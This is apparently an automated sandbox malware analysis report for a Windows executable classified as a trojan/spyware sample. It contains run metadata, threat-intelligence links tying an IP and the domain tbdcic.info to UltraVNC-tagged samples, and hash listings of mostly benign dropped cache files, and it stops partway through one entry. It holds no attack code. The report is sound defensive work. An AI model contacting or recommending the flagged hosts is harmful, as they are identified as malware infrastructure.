                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579878
                                                  Start date and time:2024-12-23 13:37:07 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 18s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Run name:Run with higher sleep bypass
                                                  Number of analysed new started processes analysed:42
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:T8xrZb7nBL.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
                                                  Detection:MAL
                                                  Classification:mal84.troj.spyw.evad.winEXE@69/63@3/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 172.64.41.3, 162.159.61.3, 23.218.208.137, 23.195.39.65, 199.232.210.172, 184.30.20.134, 2.19.198.27, 23.32.239.56, 2.16.168.102, 2.16.168.117, 23.218.208.109, 3.233.129.217, 4.245.163.56
                                                  • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: T8xrZb7nBL.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  No simulations

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  194.190.152.201mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                    7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          bg.microsoft.map.fastly.netmSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 199.232.214.172
                                                          q8b3OisMC4.dllGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                          • 199.232.210.172
                                                          Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                          • 199.232.210.172
                                                          mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 199.232.214.172
                                                          eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                          • 199.232.210.172
                                                          0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                          • 199.232.210.172
                                                          #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          tbdcic.infomSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          RSHB-ASRUmSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          • 194.190.152.201
                                                          Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                          • 194.190.152.129
                                                          Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                          • 194.190.152.129
                                                          document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                          • 194.190.152.129
                                                          tiago.exeGet hashmaliciousReverse SSHBrowse
                                                          • 194.190.152.129
                                                          0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                          • 194.190.152.148

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTmSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                            7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                              Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hmSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                    7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.195270130887246
                                                                          Encrypted:false
                                                                          SSDEEP:6:1Iq2PCHhJ2nKuAl9OmbnIFUt8pZmw+/IkwOCHhJ2nKuAl9OmbjLJ:+vBHAahFUt8p/+A56HAaSJ
                                                                          MD5:69EF59459CFFD64E60C0F0A9120E4B46
                                                                          SHA1:9C27D4FE90EEA23A4D90414FBC41C39F3141206D
                                                                          SHA-256:11F432064C2707588A8BDC3CE310C21B2C3CEB69E859F62B08FE16E5CED1478C
                                                                          SHA-512:B5F673B017E1CB6704EE68E47BF94C222F11EBEC5F44D04B010F72D30CF941DAF309D3B9DD2DFFEC485133B8FD16757DA71327758D8CF6843F031B8060AC68D3
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.900 1790 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:38:07.903 1790 Recovering log #3.2024/12/23-07:38:07.904 1790 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.195270130887246
                                                                          Encrypted:false
                                                                          SSDEEP:6:1Iq2PCHhJ2nKuAl9OmbnIFUt8pZmw+/IkwOCHhJ2nKuAl9OmbjLJ:+vBHAahFUt8p/+A56HAaSJ
                                                                          MD5:69EF59459CFFD64E60C0F0A9120E4B46
                                                                          SHA1:9C27D4FE90EEA23A4D90414FBC41C39F3141206D
                                                                          SHA-256:11F432064C2707588A8BDC3CE310C21B2C3CEB69E859F62B08FE16E5CED1478C
                                                                          SHA-512:B5F673B017E1CB6704EE68E47BF94C222F11EBEC5F44D04B010F72D30CF941DAF309D3B9DD2DFFEC485133B8FD16757DA71327758D8CF6843F031B8060AC68D3
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.900 1790 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:38:07.903 1790 Recovering log #3.2024/12/23-07:38:07.904 1790 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):335
                                                                          Entropy (8bit):5.1798968773727125
                                                                          Encrypted:false
                                                                          SSDEEP:6:eAvAQyq2PCHhJ2nKuAl9Ombzo2jMGIFUt8V0DG1Zmw+VaVSQRkwOCHhJ2nKuAl97:eA9yvBHAa8uFUt8Cc/+YjR56HAa8RJ
                                                                          MD5:20FAB29F627C38E5F9EF6A755406DCA1
                                                                          SHA1:FA1A338F04E9AB0DE7D63CBDC553EB0708C37A82
                                                                          SHA-256:A1E65992B9E620503F780264C9E6D9D0D0C6A018778015F98778CDAC153DBAC9
                                                                          SHA-512:280CAEA9C3B50B827EEB89C45904ACCF5EF4D26ED91DCEA10E4593A6A2D173574E51D5FD1A5A20F19285F79C2A63844215BB50425D7ECC362619CAFFE2F2A13F
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.999 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:38:08.001 f90 Recovering log #3.2024/12/23-07:38:08.002 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):335
                                                                          Entropy (8bit):5.1798968773727125
                                                                          Encrypted:false
                                                                          SSDEEP:6:eAvAQyq2PCHhJ2nKuAl9Ombzo2jMGIFUt8V0DG1Zmw+VaVSQRkwOCHhJ2nKuAl97:eA9yvBHAa8uFUt8Cc/+YjR56HAa8RJ
                                                                          MD5:20FAB29F627C38E5F9EF6A755406DCA1
                                                                          SHA1:FA1A338F04E9AB0DE7D63CBDC553EB0708C37A82
                                                                          SHA-256:A1E65992B9E620503F780264C9E6D9D0D0C6A018778015F98778CDAC153DBAC9
                                                                          SHA-512:280CAEA9C3B50B827EEB89C45904ACCF5EF4D26ED91DCEA10E4593A6A2D173574E51D5FD1A5A20F19285F79C2A63844215BB50425D7ECC362619CAFFE2F2A13F
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.999 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:38:08.001 f90 Recovering log #3.2024/12/23-07:38:08.002 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF657beb.TMP (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b669aa51-fc63-4b04-aaa7-21e918dd7ffd.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ec186d58-1879-4301-ae16-2742e07ad5b3.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.965604377944479
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sq70hsBdOg2HEAcaq3QYiub6P7E4TX:Y2sRds2dMHEr3QYhbS7n7
                                                                          MD5:C74C689E298AA244CE21A9702B9659FD
                                                                          SHA1:BCA453B6A241A5391E08DADBE71C916A963CB3D6
                                                                          SHA-256:18672BB673CA91F5AE0EAABB56F22AC800B079E82CDFCE7930C8D4439138A3D2
                                                                          SHA-512:3619253A1C276083D478A0E3DA34C55508AC9F242A36CF093B19970C2CA6AB533F3AE2A20EFC34251A5ADCD52917804BEC12776C1C22AFF1529BEBE8FE2FEF13
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517496928884","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":769977},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3878
                                                                          Entropy (8bit):5.235757676495416
                                                                          Encrypted:false
                                                                          SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bZNkdzc:S43C4mS7fFi0KFYDjr3LWO3V3aw+bZee
                                                                          MD5:62BB98586AE0CB3B6D84BF7A0DEBC844
                                                                          SHA1:011F7CBD17EB62521C590771D792AA00F93FE0DA
                                                                          SHA-256:4D4A68F9F64C215C1BD32D340972340432C184C4D6618A10270C5193CC1317DA
                                                                          SHA-512:F4226E639CAE1BF23EE4E49BB4A404870965E6F1109E7D6920B93F565090166ED16FB7ED3E51450882251F8E51D606F67F4E60F647C9833CE6CB1BA2779B2621
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):323
                                                                          Entropy (8bit):5.216169555019848
                                                                          Encrypted:false
                                                                          SSDEEP:6:2nvwQyq2PCHhJ2nKuAl9OmbzNMxIFUt8VBG1Zmw+V+QRkwOCHhJ2nKuAl9OmbzNq:CyvBHAa8jFUt84/+pR56HAa84J
                                                                          MD5:B982F7D604B2A53FDC5EB7934C28B1CC
                                                                          SHA1:43BE6BBB3ACA50A0CB0EA92DB686A88890F19E1F
                                                                          SHA-256:B5093B30C6E5F563E362FBC2DC1A1F5799D935403E3316642BC38C7C112BCE51
                                                                          SHA-512:928A167F00029384D308323921570614C4ED250AB289F55169079B66A8E78DD26C53852A922A45E43195E56D60D998144B6D68A8249E8661193EC1F07D8DBB2C
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:08.791 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:38:08.792 f90 Recovering log #3.2024/12/23-07:38:08.793 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):323
                                                                          Entropy (8bit):5.216169555019848
                                                                          Encrypted:false
                                                                          SSDEEP:6:2nvwQyq2PCHhJ2nKuAl9OmbzNMxIFUt8VBG1Zmw+V+QRkwOCHhJ2nKuAl9OmbzNq:CyvBHAa8jFUt84/+pR56HAa84J
                                                                          MD5:B982F7D604B2A53FDC5EB7934C28B1CC
                                                                          SHA1:43BE6BBB3ACA50A0CB0EA92DB686A88890F19E1F
                                                                          SHA-256:B5093B30C6E5F563E362FBC2DC1A1F5799D935403E3316642BC38C7C112BCE51
                                                                          SHA-512:928A167F00029384D308323921570614C4ED250AB289F55169079B66A8E78DD26C53852A922A45E43195E56D60D998144B6D68A8249E8661193EC1F07D8DBB2C
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:08.791 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:38:08.792 f90 Recovering log #3.2024/12/23-07:38:08.793 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123814Z-230.bmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                          Category:dropped
                                                                          Size (bytes):66934
                                                                          Entropy (8bit):2.436424201832609
                                                                          Encrypted:false
                                                                          SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                          MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                          SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                          SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                          SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                          Malicious:false
                                                                          Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):71954
                                                                          Entropy (8bit):7.996617769952133
                                                                          Encrypted:true
                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                          Malicious:false
                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

